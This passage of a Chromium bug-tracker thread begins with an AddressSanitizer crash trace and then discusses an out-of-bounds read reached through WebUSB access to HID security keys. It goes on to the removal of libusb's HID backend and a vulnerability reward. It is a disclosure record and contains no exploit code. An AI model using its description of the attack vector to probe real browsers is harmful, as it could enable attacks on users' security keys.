#61 0x7ff7f832234c (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x14000234c)
#62 0x7ff7f8660c18 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x140340c18)
#63 0x7ffe1b5b1fe3 (C:\Windows\System32\KERNEL32.DLL+0x180011fe3)
#64 0x7ffe1d9befc0 (C:\Windows\SYSTEM32\ntdll.dll+0x18006efc0)
0x120badf8ad02 is located 0 bytes to the right of 4098-byte region [0x120badf89d00,0x120badf8ad02)
allocated by thread T46 here:
#0 0x7ff7f835a486 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x14003a486)
#1 0x7ffdde9227ef (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1861c27ef)
#2 0x7ffdde918bcf (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1861b8bcf)
#3 0x7ffdde931d08 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1861d1d08)
#4 0x7ffdde8ece23 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18618ce23)
#5 0x7ffddc1bf851 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a5f851)
#6 0x7ffddc1c51ff (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a651ff)
#7 0x7ffddc1c3acc (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a63acc)
#8 0x7ffddc1df440 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a7f440)
#9 0x7ffddbf61f3f (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183801f3f)
#10 0x7ff7f8351d78 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x140031d78)
#11 0x7ffe1b5b1fe3 (C:\Windows\System32\KERNEL32.DLL+0x180011fe3)
#12 0x7ffe1d9befc0 (C:\Windows\SYSTEM32\ntdll.dll+0x18006efc0)
SUMMARY: AddressSanitizer: memcpy-param-overlap (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x14003afd8)
==4836==ABORTING
,
Mar 4 2018
I think what's going on here is that a latent feature in libusb is trying to provide a translation between raw USB commands and the Windows HID driver in order to make the device available. We should disable this path entirely as we never want libusb doing this translation.
,
Mar 4 2018
Another interesting note: the transferIn calls will block. But if a U2F authentication is started in another Window they will return empty ArrayBuffers via DataView. I suspect there is some initialization going on internally and the device is accessed in parallel by WebUSB and the U2F extension.
,
Mar 5 2018
vervier@: Can you please provide a few crash IDs from chrome://crashes from your repros on an official build? reillyg@: Do you mind owning this? This bug is just for the crash, since we already knew about the security implications of the first part (claiming HID devices via WebUSB).
,
Mar 5 2018
Sure, here are crash IDs from Version 64.0.3282.186 (Official Build) (64-bit): Uploaded Crash Report ID 7cfe1034a64407c5 (Local Crash ID: f1bdc24e-9ac0-4c02-b423-552ff972650c) (Yubikey NEO) Uploaded Crash Report ID a9df17569b1cb730 (Local Crash ID: ce417622-c8ea-42cc-8498-5ab0fdb9cd70) (Feitian ePass U2F) Uploaded Crash Report ID a9e61aa6e636254d (Local Crash ID: 3fe7eddf-8958-475d-ab0d-5dee55d40618) (Yubikey NEO)
,
Mar 5 2018
Thanks. Confirmed that those show OOB reads while receiving USB device data.
,
Mar 8 2018
,
Mar 23 2018
r541265 removed the HID backend from libusb, making this issue obsolete.
,
Mar 24 2018
,
Mar 26 2018
,
Apr 1 2018
Hello! I'm afraid the VRP panel declined to reward for this report. However, do you know if the OOB read is still accessible over the HID APIs we still expose? If so we could reconsider.
,
Apr 1 2018
The HID API we still expose (the chrome.hid API) is a separate implemention.
,
Apr 2 2018
Hi, the OOB read access was triggered via the WebUSB-API. You removed access to the whole HID device class so at least this vector should be gone. However, I would not rule out this is triggerable via other vectors since I do not see any fix for the root cause. Unfortunately I can't currently afford to invest more of my free time to investigate this more deeply. From the panel's point of view what is the difference between me finding an additional vector to trigger this and the current one that you fixed after my report? Markus
,
Apr 2 2018
Can you elaborate on what you believe the root cause to be? libusb uses separate code for I/O operations through HID and WinUSB. The HID path, which is what performed the OOB access, has been removed. The WinUSB path has no analogous function.
,
Apr 2 2018
The OOB access looks to me like a race condition when accessing the device (could have been concurrently to chrome.hid or the u2f plugin). When you investigated the bug, could you confirm the cause was internal to the libusb HID path? If not could it be possible that the OOB read just occurred there, and the root cause was external? In the latter case it might make sense to try to debug into this further..
,
Jun 19 2018
After examining this bug and issue 818592 , the VRP panel has decided to award $5,000 for this report. Amongst other causes of confusion, the code change mentioned in comment 9 referenced 818592 and we presumed the change was made in response to that issue, not this. Comment 4 of issue 818592 shows that wasn't the case, and we should have initially rewarded this report. A member of our finance team will be in touch to arrange for payment or, should you choose, donation. We'd also like to thank you for your WebUSB security research presented at OffensiveCon, and would like to note that it might also have been eligible for a reward had you worked with us before making it public.
,
Jun 19 2018
,
Jun 30 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by elawrence@chromium.org
, Mar 4 2018